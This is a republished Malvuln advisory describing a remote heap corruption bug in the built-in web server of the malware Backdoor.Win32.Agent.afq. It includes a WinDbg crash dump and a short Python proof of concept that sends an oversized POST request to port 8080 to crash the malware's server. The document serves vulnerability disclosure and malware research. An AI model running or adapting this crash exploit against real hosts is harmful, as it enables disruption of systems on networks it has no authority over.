BACKDOOR.WIN32.AGENT.AFQ / Remote Heap Corruption

2021.04.28
us malvuln (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/853754de6b8ffbe1321a8c91aab5c232_C.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.afq Vulnerability: Remote Heap Corruption Description: The malwares built-in server "UberWWW v. 1.1" listens on TCP port 8080. Third-party attackers who can reach the infected host can send a 2000 byte HTTP Post request, triggering a heap corruption overwriting ECX, EDX and AX (16-bit) part of the EAX register. Type: PE32 MD5: 853754de6b8ffbe1321a8c91aab5c232 Vuln ID: MVID-2021-0190 Dropped files: ASLR: False DEP: False Safe SEH: True Disclosure: 04/27/2021 Memory Dump: EAX : 00004141 EBX : 02B71208 ECX : 41414141 EDX : 41414141 EBP : 02A0FD30 ESP : 02A0FB70 ESI : 02B71210 EDI : 02B70000 EIP : 77AC2D6A ntdll.77AC2D6A (1b1c.1048): Access violation - code c0000005 (first/second chance not available) eax=0000f23c ebx=02781208 ecx=41414141 edx=41414141 esi=02781210 edi=02780000 eip=77ac2d6a esp=02cef1f0 ebp=02cef3b0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 ntdll!RtlpAllocateHeap+0x37a: 77ac2d6a 8b09 mov ecx,dword ptr [ecx] ds:002b:41414141=???????? 0:002> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Agent.afq.853754de6b8ffbe1321a8c91aab5c232.exe FAULTING_IP: ntdll!RtlpAllocateHeap+37a 77ac2d6a 8b09 mov ecx,dword ptr [ecx] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 77ac2d6a (ntdll!RtlpAllocateHeap+0x0000037a) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 PROCESS_NAME: Backdoor.Win32.Agent.afq.853754de6b8ffbe1321a8c91aab5c232.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 41414141 READ_ADDRESS: 41414141 FOLLOWUP_IP: msvcrt!signal+95 75746f35 59 pop ecx MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00001048 BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_multiple_entries_corruption_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_multiple_entries_corruption_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_multiple_entries_corruption_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 77ac16b7 to 77ac2d6a STACK_TEXT: 02cef3b0 77ac16b7 00000078 00000080 027802d4 ntdll!RtlpAllocateHeap+0x37a 02cef400 77ac13ee 00000000 00000000 00000078 ntdll!RtlpAllocateHeapInternal+0x2b7 02cef41c 75737250 02780000 00000000 00000078 ntdll!RtlAllocateHeap+0x3e 02cef43c 757376bb 00000078 0000000b 02780dc8 msvcrt!malloc+0x90 02cef454 75746f35 00000078 96d98a3c 00401000 msvcrt!_malloc_crt+0x18 02cef494 00401099 0000000b 00000000 00000000 msvcrt!signal+0x95 WARNING: Stack unwind information not available. Following frames may be wrong. 02cef4b4 771ad820 02cef580 1d76a8f9 00000000 Backdoor_Win32_Agent_afq_853754de6b8ffbe1321a8c91aab5c232+0x1099 02cef550 77b237e1 02cef580 77af2d82 02ceffcc KERNELBASE!UnhandledExceptionFilter+0x1a0 02ceffdc 77ae4a47 ffffffff 77b09ea9 00000000 ntdll!__RtlUserThreadStart+0x3ed99 02ceffec 00000000 00402950 000000f4 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: !heap ; ~2s; .ecxr ; kb SYMBOL_STACK_INDEX: 5 SYMBOL_NAME: msvcrt!signal+95 FOLLOWUP_NAME: MachineOwner MODULE_NAME: msvcrt IMAGE_NAME: msvcrt.dll DEBUG_FLR_IMAGE_TIMESTAMP: 692918b7 FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_multiple_entries_corruption_FILL_PATTERN_41414141_c0000005_msvcrt.dll!signal BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_multiple_entries_corruption_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_msvcrt!signal+95 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=8080 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="POST /"+"A"*2000+" HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 10000\r\n\r\n" s.send(PAYLOAD) s.close() print("Backdoor.Win32.Agent.afq / Remote Heap Corruption") print("MD5: 853754de6b8ffbe1321a8c91aab5c232") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top